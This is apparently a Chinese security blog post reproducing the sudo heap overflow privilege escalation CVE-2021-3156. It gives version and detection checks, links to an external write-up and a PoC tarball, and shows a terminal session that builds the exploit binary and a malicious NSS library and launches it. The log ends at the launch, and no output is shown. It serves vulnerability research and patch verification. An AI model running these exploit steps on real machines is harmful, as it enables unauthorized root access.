Linux sudo 权限提升漏洞复现 (CVE-2021-3156)
Web安全
前言
前几天我发了一篇文章,在1月26号当天Sudo发布了安全通告,称修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。漏洞详情可以点这里去看一下这篇文章,里面详细介绍了该漏洞的原理和简单修复方法。目前漏洞的细节已经公开的非常全面了,受影响的用户尽快采取措施吧。
漏洞检测
查看sudo版本
sudo --version
检测是否存在漏洞
sudoedit -s /- 若返回如图以“ sudoedit:”开头的错误,则当前系统可能存在安全风险。
- 不受影响的系统将显示以“ usage:”开头的错误
EXP利用
利用细节
具体利用细节可以访问改网址自行查看,这里就不过多叙述了。
https://www.kalmarunionen.dk/writeups/sudo/exp地址
https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz操作如下
test@dz:~/CVE-2021-3156$ id
uid=1001(test) gid=1001(test) 组=1001(test)
test@dz:~/CVE-2021-3156$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 20.04.1 LTS
Release: 20.04
Codename: focal
test@dz:~/CVE-2021-3156$ uname -a
Linux dz 5.4.0-47-generic #51-Ubuntu SMP Fri Sep 4 19:50:52 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
test@dz:~/CVE-2021-3156$ sudo -V
Sudo 版本 1.8.31
Sudoers 策略插件版本 1.8.31
Sudoers 文件语法版本 46
Sudoers I/O plugin version 1.8.31
test@dz:~/CVE-2021-3156$ id
uid=1001(test) gid=1001(test) 组=1001(test)
test@dz:~/CVE-2021-3156$ make
rm -rf libnss_X
mkdir libnss_X
gcc -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c
test@dz:~/CVE-2021-3156$ ls
CVE-2021-3156_nss_poc_ubuntu hax.c lib.c libnss_X Makefile sudo-hax-me-a-sandwich
test@dz:~/CVE-2021-3156$ ./sudo-hax-me-a-sandwich
本作品采用《CC 协议》,转载必须注明作者和本文链接
推荐文章: